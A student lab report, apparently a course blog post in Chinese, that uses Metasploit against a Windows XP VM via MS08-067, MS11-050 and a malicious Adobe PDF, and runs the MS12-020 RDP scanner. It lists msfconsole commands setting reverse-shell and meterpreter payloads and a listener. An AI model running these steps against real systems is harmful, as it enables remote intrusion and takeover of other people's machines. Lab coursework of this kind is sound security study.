2018-2019~6 20165107 网络对抗技术 Exp5 MSF基础应用

20165107 网络对抗技术 Exp5 MSF基础应用

1.实验内容

1.1一个主动攻击实践,如ms08_067(成功)

1.2 一个针对浏览器的攻击,如ms11_050(成功)

1.3 一个针对客户端的攻击,如Adobe(成功)

1.4 成功应用任何一个辅助模块,如scanner/rdp/ms12_020_check(唯一,成功)

 

2.基础问题回答:用自己的话解释什么是exploit,payload,encode.

  • exploit相当于是载具,是渗透攻击模块,将负责攻击的代码传送到靶机中。
  • payload相当于载荷,是我们exploit中shellcode中的主要功能代码,负责执行攻击。
  • Encode用于对payload进行编码,通过修改字符,实现免杀,不让杀软轻易的发现payload是攻击代码。

 

3.实验过程

任务一:一个主动攻击实践——漏洞MS08_067

  • 关于漏洞MS08_067的原理

安全公告:KB958644   时间:2008年底

原理:攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,通过MSRPC接口调用serve服务函数NetPathCanonicalize函数对进行远程访问的路径规范化,而此函数中存在栈缓冲区内存漏洞,可被利用实施远程代码执行

详细原理说明:在规范化路径操作中,就是将路径字符串中'/'置换成''以及出去相对路径(例如:'.'),而服务程序在这部分的地址空间检查存在逻辑漏洞,攻击者可以在函数除去“..”字符串时,将路径字符串中的内容复制到路径串之前的地址空间中,覆盖掉返回地址执行shellcode(原理类似我们之前所做的缓冲区溢出攻击)

受影响的操作系统:windows 2000/xp/server 2003/server 2008/vista/7 Beta

  • 攻击过程

靶机:Windows XP SP3 English   IP:192.168.150.135

主机:Kali                                      IP:192.168.150.132

  • 实验步骤

先用search ms08_067指令查询一下针对该漏洞可以运用的攻击模块.

再用use exploit/windows/smb/ms08_067_netapi使用该模块,再使用show payloads查看可以供我们使用的payload.

 

 

我们的目的是为了获取靶机的shell,因此这里我们选择通过反向连接来获取shell的generic/shell_reverse_tcp当payload,使用指令set payload generic/shell_reverse_tcp对payload进行设置。再使用指令show options查看我们需要设置的参数,发现需要设置一个RHOST(远程主机,即靶机的IP地址)和一个LHOST(本地主机,即攻击机的IP地址).

 接着使用exploit指令开始攻击,攻击成功后获取了靶机的shell,使用dir指令查看目录文件.

 

 

任务二:一个针对浏览器的攻击,如ms11_050.

  • 关于漏洞的原理

原理:IE浏览器MSHTML模块在处理无效标签时存在use-after-free漏洞

影响范围:IE Exploer 7 以及 IE Exploer 8

 

  • 攻击过程

靶机:Windows XP SP3 English  IP:192.168.150.135

主机:Kali                                     IP:192.168.150.132

  • 实验步骤

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞

msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连

msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.150.132//攻击机ip

msf exploit(ms11_050_cobjectelement) > set LPORT 5107//攻击端口固定

msf exploit(ms11_050_cobjectelement) > set URIPATH 5107ky //统一资源标识符路径设置

msf exploit(ms11_050_cobjectelement) > exploit.

 

在访问http://192.168.150.132:8080/5107ky时,可见攻击机出现访问信息.

kali连接成功!

 

任务三:一个针对客户端的攻击Adobe_cooltype_sing.

 

  • 漏洞原理及攻击机型

这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出。

攻击机:kali   IP:192.168.150.136   靶机:windows XP sp3   IP:192.168.150.135    Adobe:9.3 

  •  实验步骤

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf > use windows/fileformat/adobe_cooltype_sing

msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp` //tcp反向回连

msf exploit(adobe_cooltype_sing) > set LHOST 192.168.150.136 //攻击机ip

msf exploit(adobe_cooltype_sing) > set LPORT 5107 //攻击端口

msf exploit(adobe_cooltype_sing) > set FILENAME 5107.pdf //设置生成pdf文件的名字

msf exploit(adobe_cooltype_sing) > exploit //攻击

可成功生成5107.pdf 

 

 

pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:

msf > use exploit/multi/handler //进入监听模块

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接

msf exploit(handler) > set LHOST 192.168.150.136 //攻击机ip

msf exploit(handler) > set LPORT 5107 //攻击端口固定

msf exploit(handler) > exploit

 

然后在靶机上打开5107.pdf文件

 

kali连接成功!

 

任务四:成功应用任何一个辅助模块——rdp/ms12_020check.

 首先打开辅助模块

找到测试需要的模块:auxiliary/scanner/rdp/ms12_020_check,它的作用是扫描验证目标机是否具有此漏洞,具体步骤如下所示.

经过exploit运行后显示关于漏洞是否可利用是不可靠的

 

 

4.思考题:离实战还缺些什么技术或步骤

本次实验对靶机的版本、对补丁的要求很多,系统均用的是较老的版本,对于现实的攻击情况已经不大适用,要想研究最新的msf攻击技术,就要继续深入学习,掌握更多msf工具,并不断提升自己的代码编程能力。

 

 

5.实验感想

本次实验我对MSF工具进行了基础运用,体会到了msf工具的功能强大,在实验过程中,寻找合适版本的的虚拟机并安装用时较长,在寻找工具过程中,体会到学会查找工具的用途也很重要,如show targets、show payloads等命令。实验过程很有趣,攻击成功有小小的成就感,本次msf基础实验也是为后续实验打基础,接下来还需继续深入学习研究。

 

posted on 2019-04-16 22:44  刘一林  阅读(125)  评论(0编辑  收藏

导航